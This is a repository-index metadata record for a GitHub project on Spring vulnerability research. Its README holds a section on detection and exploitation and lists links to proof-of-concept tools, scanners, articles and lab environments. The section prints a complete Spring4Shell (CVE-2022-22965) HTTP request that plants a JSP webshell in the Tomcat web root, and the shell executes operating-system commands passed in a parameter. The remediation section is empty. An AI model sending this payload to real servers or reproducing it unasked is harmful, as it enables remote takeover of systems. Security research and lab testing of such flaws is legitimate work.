{"id":19520096,"url":"https://github.com/hackjava/spring","last_synced_at":"2025-10-12T22:41:29.315Z","repository":{"id":63112674,"uuid":"475495888","full_name":"HackJava/Spring","owner":"HackJava","description":"《Spring漏洞研究》","archived":false,"fork":false,"pushed_at":"2022-04-26T13:08:31.000Z","size":25125,"stargazers_count":46,"open_issues_count":0,"forks_count":14,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-26T07:35:30.943Z","etag":null,"topics":["0e0w","cve-2022-22965","spring","spring4shell","springshell"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/HackJava.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-03-29T15:05:21.000Z","updated_at":"2025-03-19T11:57:25.000Z","dependencies_parsed_at":"2022-11-13T03:45:33.712Z","dependency_job_id":null,"html_url":"https://github.com/HackJava/Spring","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/HackJava/Spring","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/HackJava%2FSpring/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/HackJava","download_url":"https://codeload.github.com/HackJava/Spring/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositor
ies/HackJava%2FSpring/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279013279,"owners_count":26085250,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-12T02:00:06.719Z","response_time":53,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["0e0w","cve-2022-22965","spring","spring4shell","springshell"],"created_at":"2024-11-11T00:23:47.501Z","updated_at":"2025-10-12T22:41:29.298Z","avatar_url":"https://github.com/HackJava.png","language":null,"readme":"# HackSpring - Eternal Spring\n\nThis project is a tribute to the most invincible framework in the universe, Spring! It also records some of what I have come across while studying Spring vulnerabilities. The project will be updated continuously; it was created on March 30, 2022, and was last updated on April 26, 2022. Author: [0e0w](https://github.com/0e0w)\n\n- [01-Spring Basics]()\n- [02-Spring Framework Identification]()\n- [03-Spring Superstructure]()\n- [04-Spring Vulnerability Summary]()\n- [05-Spring Detection and Exploitation]()\n- [06-Spring Vulnerability Remediation]()\n- [07-Spring Analysis Articles]()\n- [08-Spring Lab Environments]()\n\n## 01-Spring Basics\n\n- Spring\n- SpringBoot\n\n## 02-Spring Framework Identification\n\n- https://mp.weixin.qq.com/s/cmkTMw_QS8o1wMsRd0E0XQ\n\n## 03-Spring Superstructure\n\n**Spring + ? = rce!**\n\n## 04-Spring Vulnerability Summary\n\n- CVE-2022-22965\n\n## 05-Spring Detection and Exploitation\n\nHow can you tell whether a website is affected by a Spring vulnerability? How do you find hosts with Spring vulnerabilities on an internal network?\n\nI. Payload\n\n```\nPOST / HTTP/1.1\nHost: 127.0.0.1:8090\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: close\nsuffix: %\u003e//\nc1: Runtime\nc2: \u003c%\nDNT: 1\nContent-Type: 
application/x-www-form-urlencoded\nContent-Length: 761\n\nclass.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di\u0026class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp\u0026class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT\u0026class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell\u0026class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=\n```\n\nII. Source Code Detection\n- https://github.com/webraybtl/springcore_detect\n\nIII. Vulnerability Verification\n\n- During testing, it was found that the webshell can only be written once! The second attempt fails!\n\nIV. Vulnerability Scanning\n\nV. Other Tools\n- https://github.com/TheGejr/SpringShell\n- https://github.com/BobTheShoplifter/Spring4Shell-POC\n- https://github.com/kh4sh3i/Spring-CVE\n- https://github.com/GuayoyoCyber/CVE-2022-22965\n- https://github.com/viniciuspereiras/CVE-2022-22965-poc\n- https://github.com/reznok/Spring4Shell-POC\n- https://github.com/jschauma/check-springshell\n- https://github.com/colincowie/Safer_PoC_CVE-2022-22965\n- https://github.com/alt3kx/CVE-2022-22965\n- https://github.com/alt3kx/CVE-2022-22965_PoC\n- https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE\n- https://github.com/light-Life/CVE-2022-22965-GUItools\n- https://github.com/Mr-xn/spring-core-rce\n- https://github.com/Kirill89/CVE-2022-22965-PoC\n- https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE\n- https://github.com/likewhite/CVE-2022-22965\n- https://github.com/mebibite/springhound\n- https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell\n- https://github.com/hktalent/spring-spel-0day-poc\n- https://github.com/darryk10/CVE-2022-22963\n- 
https://github.com/WeiJiLab/Spring4Shell-POC\n- https://github.com/Corgizz/SpringCloud\n- https://github.com/NewBeginning6/spring-Framework-rce\n- https://github.com/wjl110/CVE-2022-22965_Spring_Core_RCE\n- https://github.com/k3rwin/spring-core-rce\n- https://github.com/thelostworldFree/SpringCloud-Config-CVE-2020-5410\n- https://github.com/YanMu2020/SpringScan\n- https://github.com/wearearima/poc-cve-2018-1273\n- https://github.com/metaStor/SpringScan\n- https://github.com/fullhunt/spring4shell-scan\n- https://github.com/Qualys/spring4scanwin\n\n## 06-Spring Vulnerability Remediation\n\n## 07-Spring Analysis Articles\n\n- https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html\n- https://bugalert.org/content/notices/2022-03-29-spring.html\n- https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc\n- https://www.springcloud.io/post/2022-03/spring-0day-vulnerability\n- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement\n- https://tttang.com/archive/1532\n\n## 08-Spring Lab Environments\n\n- https://github.com/jbaines-r7/spring4shell_vulnapp\n- https://github.com/Kirill89/CVE-2022-22965-PoC\n- https://github.com/DDuarte/springshell-rce-poc\n- https://github.com/XuCcc/VulEnv\n\n[![Stargazers over time](https://starchart.cc//HackJava/Spring.svg)](https://starchart.cc/HackJava/Spring)\n\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackjava%2Fspring","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackjava%2Fspring","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackjava%2Fspring/lists"}